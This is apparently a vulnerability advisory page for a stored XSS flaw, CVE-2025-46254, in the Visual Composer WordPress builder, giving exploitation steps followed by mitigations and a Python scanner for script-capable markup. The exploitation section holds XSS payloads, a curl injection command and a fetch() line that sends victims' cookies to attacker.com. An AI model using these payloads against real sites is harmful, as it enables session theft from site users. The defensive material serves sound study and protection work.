Visual Composer Website Builder, Stored XSS, CVE-2025-46254 (Critical)

How CVE-2025-46254 Works

CVE-2025-46254 is a Stored Cross-Site Scripting (XSS) vulnerability in Visual Composer Website Builder (versions up to 45.10.0). The flaw arises from improper input sanitization during web page generation, allowing attackers to inject malicious JavaScript payloads into stored content. When a victim accesses a compromised page, the script executes in their browser, enabling session hijacking, defacement, or malware delivery. The attack persists due to lack of output encoding in dynamic content rendering.

DailyCVE Form:

Platform: WordPress
Version: ≤ 45.10.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation:

1. Payload Injection:

<script>alert(document.cookie)</script>

Inserted via unprotected input fields (e.g., post editor).

2. Exfiltrate Sessions:

fetch('https://attacker.com/steal?data='+btoa(document.cookie));

3. Automated Testing:

curl -X POST -d "content=<svg/onload=alert(1)>" http://target/wp-admin/admin-ajax.php

Mitigation:

1. Patch: Upgrade to Visual Composer > 45.10.0.

2. WAF Rules:

location ~ \.php$ {
    # Matches only the literal "<script" in request arguments
    modsecurity_rules 'SecRule ARGS "@rx <script" "id:1001,deny,status:403"';
}

3. Content Security Policy (CSP):

Content-Security-Policy: default-src 'self'; script-src 'self';

4. Sanitization:

echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

5. Log Monitoring:

grep -r "eval(" /var/www/html/wp-content/plugins/visual-composer/

6. Disable Unused Features:

add_filter('vc_user_access', '__return_false');

7. Exploit Detection:

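import requests

target_url = "http://target/"  # placeholder: page to check
response = requests.get(target_url, timeout=10)
# Literal match only: flags an unencoded "<script>" tag in the returned HTML
assert "<script>" not in response.text, "XSS Detected"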

8. Backup Restoration:

wp db import clean_backup.sql
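
The literal `<script` match used by the WAF rule and the detection check above does not match the `<svg/onload=alert(1)>` test string from the Automated Testing step. As an added example (not code from the original page or from Visual Composer), this Python scanner parses stored content and flags script elements, `on*` handler attributes and `javascript:` URLs; the class and function names and the last two samples are constructed for illustration.

```python
from html.parser import HTMLParser

# URL-bearing attributes checked for javascript: schemes (illustrative, not exhaustive)
URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href"}


class ScriptableMarkupFinder(HTMLParser):
    """Collects markup that can run script when the stored content is rendered."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this
        if tag == "script":
            self.findings.append(("script-element", tag))
        for name, value in attrs:
            # Browsers drop tabs and newlines in URLs, so remove whitespace first
            compact = "".join((value or "").split()).lower()
            if name.startswith("on") and len(name) > 2:
                self.findings.append(("event-handler", f"{tag}[{name}]"))
            elif name in URL_ATTRS and compact.startswith("javascript:"):
                self.findings.append(("javascript-url", f"{tag}[{name}]"))


def scan_stored_content(html):
    """Return a list of (kind, location) tuples for script-capable markup."""
    finder = ScriptableMarkupFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# First two strings are the page's own test strings; the last two are constructed.
SAMPLES = {
    "page_payload_script": "<script>alert(document.cookie)</script>",
    "page_payload_svg": "<svg/onload=alert(1)>",
    "constructed_js_link": '<a href="JavaScript:void(0)">more</a>',
    "constructed_benign": "<p>Escaped &lt;script&gt; and <a href='https://example.com/'>a link</a></p>",
}

if __name__ == "__main__":
    for label, html in SAMPLES.items():
        naive = "<script" in html.lower()
        print(f"{label}: literal_match={naive} findings={scan_stored_content(html)}")
```

Run it over exported post content or rendered pages; entity-encoded text such as `&lt;script&gt;` is reported as clean because it never becomes a tag.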

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
